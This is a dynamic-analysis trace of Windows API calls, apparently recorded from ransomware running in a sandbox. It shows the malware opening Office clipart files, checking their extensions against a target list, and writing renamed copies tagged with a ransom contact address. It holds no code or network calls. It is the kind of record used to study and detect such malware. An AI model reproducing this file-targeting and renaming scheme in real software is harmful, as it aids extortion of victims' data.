(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.688] CloseHandle (hObject=0x484) returned 1 [0171.689] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.689] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.689] CloseHandle (hObject=0x484) returned 1 [0171.690] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.690] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.690] CloseHandle (hObject=0x484) returned 1 [0171.691] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.691] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.691] CloseHandle (hObject=0x484) returned 1 [0171.761] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.761] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.762] CloseHandle (hObject=0x414) returned 1 [0171.763] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.763] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.763] CloseHandle (hObject=0x414) returned 1 [0171.765] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.765] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.765] CloseHandle (hObject=0x414) returned 1 [0171.766] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.766] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.766] CloseHandle (hObject=0x414) returned 1 [0171.768] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.768] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.768] CloseHandle (hObject=0x414) returned 1 [0171.769] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.769] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.769] CloseHandle (hObject=0x414) returned 1 [0171.770] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.770] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.770] CloseHandle (hObject=0x414) returned 1 [0171.772] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.772] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.772] CloseHandle (hObject=0x414) returned 1 [0171.773] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.773] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.774] CloseHandle (hObject=0x414) returned 1 [0172.662] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.662] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.663] CloseHandle (hObject=0x378) returned 1 [0172.663] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.663] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.664] CloseHandle (hObject=0x378) returned 1 [0172.664] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.664] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.665] CloseHandle (hObject=0x378) returned 1 [0172.666] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.666] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.666] CloseHandle (hObject=0x378) returned 1 [0172.667] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.667] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.667] CloseHandle (hObject=0x378) returned 1 [0172.668] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.668] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.668] CloseHandle (hObject=0x378) returned 1 [0173.049] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.049] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.050] CloseHandle (hObject=0x378) returned 1 [0173.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.050] lstrlenW (lpString=".doc") returned 4 [0173.050] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.050] lstrlenW (lpString=".docx") returned 5 [0173.050] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.051] lstrlenW (lpString=".pdf") returned 4 [0173.051] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.051] lstrlenW (lpString=".xls") returned 4 [0173.051] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.051] lstrlenW (lpString=".xlsx") returned 5 [0173.051] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.051] lstrlenW (lpString=".ppt") returned 4 [0173.051] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.051] lstrlenW (lpString=".zip") returned 4 [0173.051] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.051] lstrlenW (lpString=".rar") returned 4 [0173.051] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.051] lstrlenW (lpString=".bz2") returned 4 [0173.051] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.051] lstrlenW (lpString=".7z") returned 3 [0173.052] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.052] lstrlenW (lpString=".dbf") returned 4 [0173.052] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.052] lstrlenW (lpString=".1cd") returned 4 [0173.052] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.052] lstrlenW (lpString=".jpg") returned 4 [0173.052] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.052] lstrlenW (lpString=".doc") returned 4 [0173.052] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.052] lstrlenW (lpString=".docx") returned 5 [0173.053] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.053] lstrlenW (lpString=".pdf") returned 4 [0173.053] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.053] lstrlenW (lpString=".xls") returned 4 [0173.053] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.053] lstrlenW (lpString=".xlsx") returned 5 [0173.053] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.053] lstrlenW (lpString=".ppt") returned 4 [0173.053] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.053] lstrlenW (lpString=".zip") returned 4 [0173.053] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.053] lstrlenW (lpString=".rar") returned 4 [0173.053] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.053] lstrlenW (lpString=".bz2") returned 4 [0173.053] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.053] lstrlenW (lpString=".7z") returned 3 [0173.053] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.054] lstrlenW (lpString=".dbf") returned 4 [0173.054] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.054] lstrlenW (lpString=".1cd") returned 4 [0173.054] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF") returned 68 [0173.054] lstrlenW (lpString=".jpg") returned 4 [0173.054] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.054] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0173.054] lstrlenW (lpString="PH02746G.GIF") returned 12 [0173.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.056] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=24187) returned 1 [0173.056] CloseHandle (hObject=0x378) returned 1 [0173.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif")) returned 0x220 [0173.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.057] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.057] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.058] CloseHandle (hObject=0x378) returned 1 [0173.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.058] lstrlenW (lpString=".doc") returned 4 [0173.058] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.058] lstrlenW (lpString=".docx") returned 5 [0173.058] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.058] lstrlenW (lpString=".pdf") returned 4 [0173.058] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.058] lstrlenW (lpString=".xls") returned 4 [0173.059] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.059] lstrlenW (lpString=".xlsx") returned 5 [0173.059] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.059] lstrlenW (lpString=".ppt") returned 4 [0173.059] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString=".zip") returned 4 [0173.059] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.059] lstrlenW (lpString=".rar") returned 4 [0173.059] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.059] lstrlenW (lpString=".bz2") returned 4 [0173.059] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.059] lstrlenW (lpString=".7z") returned 3 [0173.059] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString=".dbf") returned 4 [0173.059] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString=".1cd") returned 4 [0173.059] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString=".jpg") returned 4 [0173.059] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.059] lstrlenW (lpString=".doc") returned 4 [0173.059] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.059] lstrlenW (lpString=".docx") returned 5 [0173.059] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.059] lstrlenW (lpString=".pdf") returned 4 [0173.059] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.060] lstrlenW (lpString=".xls") returned 4 [0173.060] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.060] lstrlenW (lpString=".xlsx") returned 5 [0173.060] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.060] lstrlenW (lpString=".ppt") returned 4 [0173.060] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.060] lstrlenW (lpString=".zip") returned 4 [0173.060] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.060] lstrlenW (lpString=".rar") returned 4 [0173.060] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 